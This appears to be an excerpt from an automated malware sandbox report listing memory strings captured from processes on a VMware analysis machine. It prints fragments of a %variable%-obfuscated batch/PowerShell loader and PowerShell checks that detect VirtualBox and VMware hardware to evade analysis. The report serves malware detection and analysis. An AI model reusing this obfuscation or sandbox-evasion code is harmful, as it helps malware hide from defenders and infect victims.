        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %PpkoPnXtpcwQKZraSOelGBuXOHvkiGVrdITaclAcgtdJleujVPPIpUMoUnzhRMkJgfNbgrYHncenxLMKnmp% "w%ICAyvGHdcmVRlPEwkeMWqNlykQaXnzBtIPeOokGtEOQrwmPf%J%nfmQDODVqcnEFKPDKCiwLPhZxtrCWUcYbVJimLPUlixmWbOU%s%YmGTestyXmskwbZwapCJaHrYNokDrUdwEwDKniUJClkZsFxk%J%jbmHyeUrVHgPhQgdjWFZxoiRvThOwrGhQaupIwXAClOFbeCM%N%ehPvZxMUTulFWfVEbYYgvQuNYexmACQrrvJoCkitoAwoksEx%r%qkEcfvqoNbwUaAtqEUoAvGbQQFSVugDGAZVpYNmVfvBANnsO%P%gfKqedcKiNmzCuUGyQtbEesQHsvZeBdCnePowmCxXlhkAMtK%I%BUbXTrjcMTIMHcFGKJlxFFkloWdsWiqVZLyjzfIWUNBDEPPU%c%GAAQBVfVKQIXnRfECNNWEvgEbpDSeHHygjMwHzudGCzJxLId%a%HWaQcTqktWPlsmRdikQeeJWdtJqcVxhpGzkhGRvnSBcLKiLt%m%KwBmUEZYZWxtCopWPzFTcJwrOClDGltkXXrzVUvbzlhJtcLE%S%mgWkDSqbakyrtwrODmvFWPaUeDtQBMXLRGqAoiHfGqyLvdId%S%TtghHfHwfbgZzzzomMzMfRzuEqYGrpybVpWiFQeMZTvmcIGg%D%QkyJDWXcTLCrhafPDeejDqIvINNlwmrWKRPgQPxZrUoUoMEY%r%OFJXDwDACcaPiMGGtFHplYZNHfSIbNhViOxQDusnopENPIQF%d%oHAIfpNPGWqyDVyOVeGuoPdZmtbVulYYpmutmyQTbHkGdUJs%a%RPSKbwqyEBvMoRuuYrjrBeBwoNsGFxWsJIeFtnXSVVPLdeFj%U%nQILKsRMnvvodKThFccFNPbKuqvFoQtkhitOOkIrQrrXRJOl%R%cIgabZwxPXrtXmxxclgVqesuuLPvxdTLBkDGJsjiLVZRTpuE%B%TTUGDTUXpMGqjaZLdGRNJROJcXjveAAerlBDiniIpFqXMSYK%x%VoNnxHUcfkDFKzSOlBYYzwCQxjxdAQXjYyzQNmHKqzxYJCXQ%U%NBLlTalzLXPojRBpnuGmZbbZToHaYEgVlHpZfLpYmZfPwsAz%q%XiKpWLQLzLrFslBhQUdBBCjCeHZaWlCBNicPTRYzREzttKGb%K%yYZCpYXvZikoMPPnjQRjjMnZVDKXcQiubYBXmalPlGPLGKNb%%AevHhUXunr%t%lkDTwRLLZGMoZsjZQnNnSbjEcYCWBtlQJjRFFAEgQmntzAl%l%oGLPwZNWkaYQypPjGvVEQBDupJHxFOPfBMopQEPQVmGEGKf%e%QadGYDVuMdqzMrprwlTpMbztcFfJEUYOFEQxBhRBFrBmzec% %zGVktMvtPAKEsymQReCTiASPptsJuznTXDFcIKEbklbWRCy%=%ctBKhWlTYOgVZuLYpnQGOSjihABJXyVXMUpqTPgXMKHoBOE% 
%GymMJbVKjjsDHvCVzSjjefvfAgTUelVGsVUkLMlWQkfhAly%$%BkOiwsFzAdhlChbGYoMlMBrkMGmsUaoEoIsJpcynMvtgDAJ%s%OOEgSNaMaSEvPfmFAPDXUPrqVPyyrhlGlXyEqTvQnWrRKHJ%j%hzPTraDOYxnkdpCuSHXjRGIpHtMJXyAGofqYBoTGIiAgcIs%r%BLByjMxSARAlYoUQAXHVXYDTENrBIgBmYblXwZqTRnPhbcV%S%sOrajvMuDiIUvvVjupnnWdWuAGNeKiwRBSZNqfsRlHHPOeU%;%yVdvSNPYpRXzCHIJvMQsDviSoWwbpvhGwMpiHMDeMUKVtGP%"
        Source: svchost.exe, 00000018.00000003.1776507720.00000276D75C6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
        Source: svchost.exe, 00000018.00000002.2746085607.00000276D6A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmci
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %PpkoPnXtpcwQKZraSOelGBuXOHvkiGVrdITaclAcgtdJleujVPPIpUMoUnzhRMkJgfNbgrYHncenxLMKnmp% "m%NxvZvnOFuKyQjsKIwbKIPavcmazPKpVMzmTTRRSiUizhRF%Q%JZMOrkSlSNbtMuNYVfOLrWyQREjBOGAolHrAdWXLTougRx%o%exvVnusfnMAVWMbqwlmNifdnVYidRdCsYtzLgStfVftFZh%w%ZkJDRiTepZuiaompokjiWDnpjDRgScLxnNZXtoltyUeArY%I%SfTFQivRlwXttnrMmmoWUmooWaZQJbzNYlLMnmlCbvCCaZ%O%UXcLIRludGQEJQjFhjXkviCEzZaMVzJLnWfcNXtHBEhfVI%U%DvswntFQEMuxmJQzyEWeqMLhRkPpIQaxJQvFtylpgxssHq%R%LKRcfCiQsRKlEdEpiOLXOwnkfatHYTtsAByfxFKypSyEVi%p%UhLRoEGKBoxHWfiASyxrLdEyRCdnHWYIoXflWgEPMPajIQ%w%IEpOZZhEwRDmZMAtcEqOsZZXELUIFVduQbTyXSXZAKAoIJ%T%hSosNvTTxJEsknezZBNivXScwjHroIyLoUDctmiHBXEkUF%r%IJUbLZAAnkZmWDNBFPkTdpJcfMsgGytIhQBYxmWykOHtch%x%qFTarOZaBsZRVYHuTOQrefbPesSLJpIqZXwNmGhEIhpiYF%w%qXRPUSCLdkEeWYVnqlKJRXCUinHlIWPSQycUUTvQNoUljh%O%KiJvQeypNsvXHGkqdgvLnxWbtxPUWDdrLaDzCngKuBKJzW%m%mPFwlNPxTmlHbtpDskpdmHdLNPaKqMNnBxlaoArpBngqnV%D%mMvQjzuwJFMUIvNfhhzYgEippSTZBZAMxSDnozDnTfNFnt%U%RVCwfZRoOHEgBqGuUKeaxPSzQHElfbQCbVaXxeTAUieVJi%%bhkrSvMNS%f%mGykdAnWcdcFyvFjNRbeFqIWQQEfoLWPIJrEHQMbNZXUuyvfo%"
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicNECVMWarVMware SATA CD00
        Source: svchost.exe, 00000018.00000003.1776507720.00000276D75C6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
        Source: svchost.exe, 00000018.00000000.1651889692.00000276D74D6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmcir:m
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %RnbjWFfOMtkuiuCfrscEQiumPzRiBOTFxRSTdEfBlkUUSKfciGtUjLCITPtxNWnXzEXqBJbNnBsGnzueuOa% "A%bfieItepbjsbjRyhUNfJwmYrYXTxjbYFdvpLZclT%r%bhYoPClJQFavpSIPgQfLzHgZkMXOBNiRBmIooJCw%Q%LkHEbDqlMzEiXAttbYecExhcxiTckuAxoJZpaCYG%h%wMbbiZUbTomqFzRocEgTKnasZhTnAdtzZxFSvgUx%g%nRjVhkSPSKnvvfWjLJcbfHBPVNqiTZTVKIFTdflO%U%pevPQXeUAwhMdSsGquauTKVSRrLMAdfFynMalLZX%m%IwHxSgSRqYCJfQVEjCYylrtxqBoPgrvFvcLxdyaK%g%zUvCAwAHshRJNBLrcjgqScLZCXncfxBKBnYrVRXU%x%aGxYzMRUrtuTsKRxjwZDiyCUFhhzCuvkmlqlEMAQ%Z%ftKLdIsRvAizStLCeCsrEsrXYkHgtGTwWixPNQRX%y%PpeclWsSANhcuilNcNNSalxPHLCJWWPoKuCpooLb%h%ROGGyQbOXKMZdYXDSovztIWDYSrZFWzNbLbmFRqQ%D%KOMmkPkLxYwZTlHiScIGzbiakYYrXLYaYEPFWKtj%v%IFCGzAUQdStCjKqIFLblRTOMavbovclhJzXUzBAK%A%einfrwRnohZlJisORQGdyFubGmTKMwjdkqhJFIuD%p%ENaocayBhjdIVxmzNmzfChARYVasaIjivczKEgYF%N%NsCDsAiNeHVtjpawnjphagAyZUmSXBUHnTrkEXyx%U%NmotNQYgbdxvQRFHSeEynqQDNnfqXQRpKRtNRgKi%j%VgQUdzRvnKsztakxwKFzKIilliKYxSPLuvCgzWzn%v%wJcnyrWJHWqhAkxnYFIVOSXvVGfXydXAksdaGVNU%C%lbrBCIkjXpiTnEzEMHrRmYlEYPWihwGdSOJNBwTn%%NfOpbSjnDHI%S%VajUdmGTzoZDVImQNCMLbcAIfbzULcpOeuqYbJVCppHi%s%HAWfxWOUgBuSzAPcNLhwZlyBroOdHjwMusbFftxOouHD%R%ZxyAUSPDhliwbvOiiKnXfIxhzkWtosiEDVBTPnjOtSEj%7%jFDKFoGDhKyraraJWwpPdESgUUsUBzDndoXUGmOZLEwT%;%wjTymzSXCPgEMxPKVMcIgknMtgdJIpdzhYJKbUHcHGKo%'%hsijwddZBONmWhegvipnLHxONfJbeaaAAZEbYUmEldXt%.%lxOTQAGyqxCAVuvrucUBNnLXCdiBWKbHKdCprPlEtCjc%R%wefEyUkijvFXLQrMreBGwVPRRfZERqhleIAyXEdbASyp%e%yEDAyympaDGBooMsVFrTntTdpSPMbzfDwAsmBygtdSkB%p%bZkJSKgUBFbfLAkFJznBxdeNVAQwzYPuisbqIfUqtlcR%l%znBbnBJDEJdYVwNrUJuDPHWszUWDEWhmanoIZPiYolPz%a%ocumsDwJQzbRqiCtEgYIBRXIifseBwoERxdwAJlbAyvB%"
        Source: svchost.exe, 00000018.00000000.1651889692.00000276D7474000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dowvmci
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware
        Source: svchost.exe, 00000018.00000003.1776467589.00000276D7C1E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
        Source: svchost.exe, 00000018.00000003.1776467589.00000276D7C1E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>ati
        Source: svchost.exe, 00000018.00000000.1650770311.00000276D6A2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2746085607.00000276D6A2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisoron
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
        Source: svchost.exe, 0000000F.00000002.2719299126.000001A53EA2A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000`y
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
        Source: svchost.exe, 00000027.00000000.1719652960.0000027240302000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
        Source: svchost.exe, 00000027.00000000.1719652960.0000027240302000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000018.00000002.2870533670.00000276D7F00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
        Source: svchost.exe, 00000027.00000002.2727540378.0000027240240000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %vZwMojZokINoWWunNOByEGHHsWvtupcZWsBAhkcrKNCFNeJqegrGnCqPrOtsOFTVFOrEvUfCMjORdcUomeooXwMubMitRJDeTHaZMfVkaOTdNyMpUfgKrFXibXCILMLcFJY% "X%ZZJyVbdLIYLWVpptQGkSxkOYCNIRuomUsyEiBzRuVqg%N%GjLQtVuYZngSPlLVitlqtMRDxLhSqOPWhehPRXoWapm%w%GmGPWQEJbKZMUritIOCIlxkLLeVelepqezkrQVkbMeO%Y%lhrnxJDFhyHajbUeSUAyXvJIuhRCMEAVhJYEtQyuHyh%c%SwzbpWRrhmGQQxJSqRbSCXLTzdqKcwfQynQlVfCGVnt%O%JASigJYiDFFEUKFBlFgpKhPrCHxXkpvXpEctGUkbenC%F%kTIVBqDqaOYICKAGylaYnkIpqImVquflwEEyTLWHGYu%U%irVAIfoLPdpoaltESdIZGJNlXgcMNossoPzYuhDPcIp%H%hhqEnzgdDXZOyEKCBdBYAKXZlLvkLATXXuFeGCPnGkP%M%upaauKEbLAKOwjqsBeWsdebReYFWZoorpVCKkLazgyh%J%xnFiVqjniKSLqojVvfIcxlszBGGiQdxmFWEDzPKFQag%l%HxjmwaPEtxvJlUgHoKaxemFgtJFwGuclxfKbstjhazd%N%OjnsItivVPCbuScTMvsYYukmgkepUATwFjQWgrWcyZh%P%wUdpipAxMIAeuZamyoTBuWgwlbgMuyqAZnNscUWZtdg%F%OeewXffxOExMAOGegjNcorafglIjEsThrPrshFiHpaC%x%VBAnEvQPQFbSweZpLxVTvLquKwoWBagMnPeDFYeNODc%Y%BqWUoiqxkuggklgChhTnQzoEGZvJNthfRIPeOCaOkDW%%WZYeMUZOVhbw%x%gJUszvWGUpmbbrnoMHJRmboBwbOFgfcnDWxXfdjrwBk%"
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: dwm.exe, 00000010.00000000.1593472080.000002382C25F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dRomNECVMWarVMware_SATA_CD00
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %RnbjWFfOMtkuiuCfrscEQiumPzRiBOTFxRSTdEfBlkUUSKfciGtUjLCITPtxNWnXzEXqBJbNnBsGnzueuOa% "w%JGczmXMMGgJMHRwmwmgjaHNDERgyfAqMxwccjcztWTLgPw%Y%psOLMqDsHcTzVvRoGgQXolPtdtNNngVGNiBOKtNZifOaiJ%d%gdCHmFqRheDvIsCQeAgmMNTcEmsQOjwOktnJkFUqqVaxko%L%LvxsaoTWXtkzdamzdXHOkofTFzGQWQMwSpBXtwjiVowTzL%J%BTdRSdQwewqDMAIcahHNHOypgGOzTWRltUXMNeXJFvleHP%m%JIASopmLdNvOKlorDhFejSDVpVjXhlCuIrXgYaICZIRjrZ%B%uLuoSezCFRfEDtgoDRlbftoisCycfBatEqAxDTtyUfLgau%M%xpvKeZYpTbxlWpFwxdQLanSIKKyMgaHiiYfjGuxbuoxzZs%q%XdTxIHpptjwNZtBljStpdXkvPcGPqLQsIsNvTIraSSEVMT%J%vdzjfEgKpZSyIFbzYIteeHGgsAAtxkspIWHDphFmmYcNCv%F%aMZsUVBIONwtQEdNnfGDPMYxkQchRgESDXAOtepxNahTgV%s%rbiyLXhZFoNBidTtQIjEQSeotiPjPOEfrozbYtvHLErlbS%m%WlDtkyKCfyWUfChXjRJIkTERvxnBTlBSnBmDFwEguOibee%z%nSzNvACsIcHMYMliJTXeHEqDsMmDnvKCMqjucfQaqUSjWT%i%xRVmfpdaxJBWuInZemrfZHDQgDdWOMLhHyovIbqvyMTzSg%W%LhNqQGRRTQoegBlhmKYuoVuSrdVWGnOdXZSWjxWeqQFyhD%j%UPkrziByRPNUZNKVkGbkhgJpXPOTexqVLNigLoNFBzidio%k%xituFYwWwOfUtKtIttySjmEEjWTvJHYFgJrFzJSsyOqtaR%Y%UcmSfOEqfkEPlJebnOQANKsNjKBftuVlDsbQjQCjaQDgbJ%i%yinxBCDAdkKyJvnzWKptmTInRwmHzXhlLzmsRWStHcoRgK%D%ghVBTSRIwEAZFeqWbgdyNjjUHaSWLkEQhhqeLXdouddHRR%K%rNcLaiNIXXYaUTaUXmZJSxOlkecPeKgBdPJeTZjwczksgK%B%cknzfQHhZTZRAWfYEnRwXfkWaXdDGtmweAbSBEEqUVQPfc%%ejcbCtsBNTje%$%mqeUXBKMXZqyiMeAFGCMZVnxZIACcpuRYyQmCypUtOdS%a%kfvDPukiCpzrdGVoaiJIFzAKVSYhrHslRumTnXMIelpI%o%YyiWDaUleunLFLHXwdRUWnAJubbdvbDtjRLwJbDqNhhw%h%hAoCpPlbuvMLYzCCZRPcQTBOZknuzBgPgdBTNyNGPCZO%N%eaykzbqWseFnZzDeBRBToXEUXIPAdinoUMJYMdUykkxc%=%yoUnVIfYagAhwDmQlQSjQrsmPEsxWcIeACwIOBEvdpnO%u%mCCjQemurnlhVHyrqHbXxwHTgDbKlxfBdEZnciGSQoMm%w%rpNhdnewnqqQUIcncCiTiJdrIlphajhjJvBRQUHYtInM%N%njstgtPnfSdIlwzRXWweihgzhlwhUkAzvqdySWbGtTdQ%e%rTFuvPawmjEgdSlVXHtVsDmUsaYbVQKpepinFcMejenl%u%MXvaKgJMAhyNGKbvQZAvzobNKYpUVoMnqbhvFYrPgYPX%w%RuGUarnkDRMxVIpLQOQlulxFDFPSHLoBzeWpruUEaCJy%"
        Source: dwm.exe, 00000010.00000000.1592705358.0000023829B56000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000/Y
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %RnbjWFfOMtkuiuCfrscEQiumPzRiBOTFxRSTdEfBlkUUSKfciGtUjLCITPtxNWnXzEXqBJbNnBsGnzueuOa% "A%YBhuzNxhDIWRFccEMqlqCWowPClPWNpUXllRsinefup%C%FPvWHVhPguzQcnLEWCIlPscTuQkmEdhkiGIGuGDUPYj%M%zyujEHDqCxiAmNBBQKUldnoIvEekqYNwRjDvZHFEaMF%R%MZgvTSeMjUNgmjMNaDtaDJLIdjgBjepkqICIpjkrmmE%D%CedrmnTFbHMbcnxsKMCDeECPDHeyQscNrfjEZSUopyn%B%DEGzuRRAEJIzXBnNEjvOJFYJXeSsRSnnGqZlXhJGZSx%T%eIGldMfpfUJEXGXCqZyJLvvTHCcPwzOPQhUaqSPGLDi%o%sWLbFaFtHBjLInNEBJpSGgUNQLWlxkSXincXVAxPRfh%M%oHvmMDnnWwKCmbXlTdtVxIlDulPJamzbAZGguzjIkWV%m%BxLPVXpEMxjJFwSRANDnKWJcnuRQtULLAMKfJwUMLHN%C%DqpaJBIIUGJlFNJCAfykRLyjSMMheTRBcifLYuipLmR%K%eRBfsaUtHmxWSRghXOADbPhiwHXEgXjzFUurrHuhkAj%Y%oFmnURmkAkIQoJsIKdqmKdXqYxOQquttAGSDkucMUMI%M%pWdfHZYKdTnzlIVoxdvTgQopIRPypaErXuIuUrgRsJp%C%zmgHVogFJySCyIOxQkzvdpWBRaBtfWEBwBOcBkTkjuU%w%SfSjMgTqGSomkqFQVNMANUqfXTLVGqplIudwYQPnlFX%G%JioELWtYwwUhYOMlSuYJqDcDPniReXzohWHXIoZZmrS%P%POmeHmEWSnWHgfKPyNCTzXGacgODEvZwYKnPCjBEzbH%%hvWsmWze%E%koBSXyBlKxtRhmbAybrwozIvRVmpmYuxqFQNFWFf%x%TNMBqvHqhagyJkMLGfacmmYLdVBCvnVBvmCAMgev%p%nWhlRVNgTehzVDTHPaxuUfUTfEcxHlYzbEOqeMUi%r%ivIrgvGSsVLMJJBibogmSpyIgHyqODDcgpmzwDMJ%e%YjfMAmQrdFoQGHpSWakzXpePrIFuxcMxBwoJkMhU%s%QgnjoNwyZuCvsnMJfpuRGwUbTQojtGIjSqIRbUAE%s%lhudzqenKEDUsqnulmpxymetMsDcEUHkPQGzbRBC%i%LazPdNRCdnFPFcfZcaqgNcJPXsfCKNsuLNMxNpqY%o%BaYrpSFMKHwaAuPJrKRKIpSpUleRqHlMKsFMdsze%n%MsRdqsTqXdgcxGqmiJweONwcvKqiPcFZkMXpyPYC% %rNUnBjoebsEuVvqZWOHGbLAUxgSLIbOsLTMaTiBl%-%vlgwyldPvYsJhrAGmZPvqDvaElJcIqfOnwlPEevm%"
        Source: svchost.exe, 00000018.00000003.1776507720.00000276D75C6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
        Source: svchost.exe, 00000017.00000002.2726924144.0000021C28C2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000018.00000003.1777739676.00000276D75E2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: storahciNECVMWarVMware SATA CD00
        Source: svchost.exe, 00000027.00000002.2733515683.0000027240289000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
        Source: lsass.exe, 0000000E.00000000.1576379216.0000019AB8413000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2728032922.0000019AB8413000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2717409454.000001A53EA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1585342930.000001A53EA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.1620821903.000001AD0982B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2715781969.000001AD0982B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2703475476.0000020EBFA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1622377915.0000020EBFA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2727103372.000001777B041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1627885243.000001777B041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1650770311.00000276D6A2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: dwm.exe, 00000010.00000000.1592705358.0000023829B56000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000@[LJ
        Source: cmd.exe, 00000003.00000003.1351181817.000001D54F3AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ossoPzYuhDPcIp%H%hhqEnzgdDXZOyEKCBdBYAKXZlLvkLATXXuFeGCPnGkP%M%upaauKEbLAKOwjqsBeWsdebReYFWZoorpVCKkLazgyh%J%xnFiVqjniKSLqojVvfIcxlszBGGiQdxmFWEDzPKFQag%l%HxjmwaPEtxvJlUgHoKaxemFgtJFwGuclxfKbstjhazd%N%OjnsItivVPCbuScTMvsYYukmgkepUATwFjQWgrWcyZh%P%wUdpipAxMIAeuZamyoTBuWgwlbgMuyqAZnNscUWZtdg%F%OeewXffxOExMAOGegjNcorafglIjEsThrPrshFiHpaC%x%VBAnEvQPQFbSweZpLxVTvLquKwoWBagMnPeDFYeNODc%Y%BqWUoiqxkuggklgChhTnQzoEGZvJNthfRIPeOCaOkDW%%WZYeMUZOVhbw%x%gJUszvWGUpmbbrnoMHJRmboBwbOFgfcnDWxXfdjrwBk%"
        Source: lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
        Source: svchost.exe, 00000027.00000000.1719336918.0000027240213000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: cmd.exe, 00000003.00000003.1385910302.000001D54F3A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usfnMAVWMbqwlmNifdnVYidRdCsYtzLgStfVftFZh%w%ZkJDRiTepZuiaompokjiWDnpjDRgScLxnNZXtoltyUeArY%I%SfTFQivRlwXttnrMmmoWUmooWaZQJbzNYlLMnmlCbvCCaZ%O%UXcLIRludGQEJQjFhjXkviCEzZaMVzJLnWfcNXtHBEhfVI%U%DvswntFQEMuxmJQzyEWeqMLhRkPpIQaxJQvFtylpgxssHq%R%LKRcfCiQsRKlEdEpiOLXOwnkfatHYTtsAByfxFKypSyEVi%p%UhLRoEGKBoxHWfiASyxrLdEyRCdnHWYIoXflWgEPMPajIQ%w%IEpOZZhEwRDmZMAtcEqOsZZXELUIFVduQbTyXSXZAKAoIJ%T%hSosNvTTxJEsknezZBNivXScwjHroIyLoUDctmiHBXEkUF%r%IJUbLZAAnkZmWDNBFPkTdpJcfMsgGytIhQBYxmWykOHtch%x%qFTarOZaBsZRVYHuTOQrefbPesSLJpIqZXwNmGhEIhpiYF%w%qXRPUSCLdkEeWYVnqlKJRXCUinHlIWPSQycUUTvQNoUljh%O%KiJvQeypNsvXHGkqdgvLnxWbtxPUWDdrLaDzCngKuBKJzW%m%mPFwlNPxTmlHbtpDskpdmHdLNPaKqMNnBxlaoArpBngqnV%D%mMvQjzuwJFMUIvNfhhzYgEippSTZBZAMxSDnozDnTfNFnt%U%RVCwfZRoOHEgBqGuUKeaxPSzQHElfbQCbVaXxeTAUieVJi%%bhkrSvMNS%f%mGykdAnWcdcFyvFjNRbeFqIWQQEfoLWPIJrEHQMbNZXUuyvfo%"
